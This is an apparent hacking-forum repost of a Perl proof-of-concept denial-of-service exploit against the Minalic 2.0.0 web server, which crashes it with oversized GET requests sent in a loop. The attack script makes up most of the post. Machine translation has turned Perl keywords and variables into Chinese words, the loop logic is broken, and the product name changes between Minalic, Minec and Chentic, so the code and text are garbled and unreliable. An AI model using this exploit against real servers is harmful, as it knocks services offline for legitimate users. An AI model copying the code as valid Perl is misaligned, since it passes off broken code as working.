H

Minalic 2.0.0-拒绝服务

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#!/usr/bin/perl
使用插座;
#利用标题: Minec 2.0.0-拒绝服务(DOS)
#Discovery by: Fernando Mengali
#Discovery Date: 2024年1月3日
#供应商HomePage3360 http://minalic.sourceforge.net/
#通知vendor:否报告
#测试版本: Minec 2.0.0
#测试在:窗口XP Professional -Service Pack 2和3-英语
#漏洞类型:拒绝服务(DOS)
#vídeo:
#1。描述
#这项技术在Windows XP Professional Service Pack 2和3(英语)上效果很好。
#对于这种利用,我尝试了几种策略来提高可靠性和性能3:
#静态的“呼叫ESP”
#backwards跳到距堆栈指针的已知距离。
#该服务器没有通过方法适当地处理大量数据进入Web服务器的请求。
#以下请求将大量数据发送到Web服务器以通过方法进行处理,该服务器将在接收和处理后立即崩溃,从而导致拒绝服务条件。
#Cuccess对这些问题的利用使远程攻击者可以崩溃受影响的服务器,从而拒绝对合法用户的服务。
#2。概念证明-POC
$ sis='$^o';
如果($ sis eq'windows'){
$ cmd='cls';
} 别的{
$ cmd='clear';
}
系统('$ cmd');
介绍();
主要的();
打印'[+]利用. \ n';
我的$ junk='\ x41'x 245;
我的$ host='\ x41'x 135;
我的$ i=0;
while($ i=3){
我的$ buf='get /'。 $垃圾。 'http/1.1 \ r \ n'。 'HOST:'。 $主机。 '\ r \ n \ r \ n';
我的$袜子;
套接字($ sock,af_inet,sock_stream,0)或die'[ - ]无法创建socket: $!\ n';
我的$ addr=sockaddr_in($ port,inet_aton($ ip));
连接($袜子,$ addr);
发送($袜子,$ buf,长度($ buf),0);
$ i ++;
}
打印'[+]完成- 开发成功! \ n \ n';
sub Intro {
打印'******************************************************************** \ n';
打印' * Chentic 2.0.0-拒绝服务* \ n';
打印' * * \ n';
印刷' *由Fernando Mengali * \ n'编码;
打印' * * \ n';
打印' * email: fernando.mengalli \@gmail.com * \ n';
打印' * * \ n';
打印'******************************************************************** \ n';
}
sub main {
我们的($ ip,$ port)=@argv;
除非(定义($ ip)定义($ port)){
打印'\ nusage: $ 0 ip port \ n';
出口(-1);
}
}
 
后退
顶部